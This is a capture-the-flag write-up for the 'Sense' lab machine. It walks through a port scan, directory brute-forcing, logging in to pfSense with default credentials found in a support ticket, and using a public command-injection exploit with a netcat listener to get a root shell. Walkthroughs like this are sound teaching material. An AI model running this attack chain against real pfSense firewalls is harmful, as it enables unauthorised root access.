Sense is an easy Linux box that can be exploited by performing a directory brute-force to identify the login page of pfSense. The brute-force also helps to identify a file that contains credentials for pfSense. This combination was used to exploit pfSense with a public exploit to obtain a root shell.


Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn

80/tcp  open  http
443/tcp open  https

Gobuster found the following locations: (Status: 200) (Status: 200) (Status: 200) [Size: 384]

The page:, showed the following message:

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

This strongly suggests a vulnerability is present. The following page:, showed an active user:

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

After a couple tries, it was found that the default combination is:
The user is now authenticated to the pfSense dashboard:


Searchsploit was used to identify vulnerabilities within pfSense since the changelog.txt suggested there is a unpatched vulnerability.

jeroen@kali:~$ searchsploit pfsense injection
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection                                              | php/webapps/
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                | php/webapps/
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The following exploit was used to exploit this vulnerability: The script was modified as follows:

username = 		"rohit"
password = 		"pfsense"
listener_ip = 	""
listener_port = "4444"
target_ip = ""
url = "https://{}/".format(target_ip)
proxied_url = ""

A netcat listener was setup and the script was run with:
python nc
This provided a root shell. From here the root.txt and user.txt can be retrieved.


This was a very easy box that could be exploited by properly brute-forcing for files and directories. The exploitation of pfSense was straightforward so it didn’t take too long to root this box. Hope you had the same and enjoyed this writeup!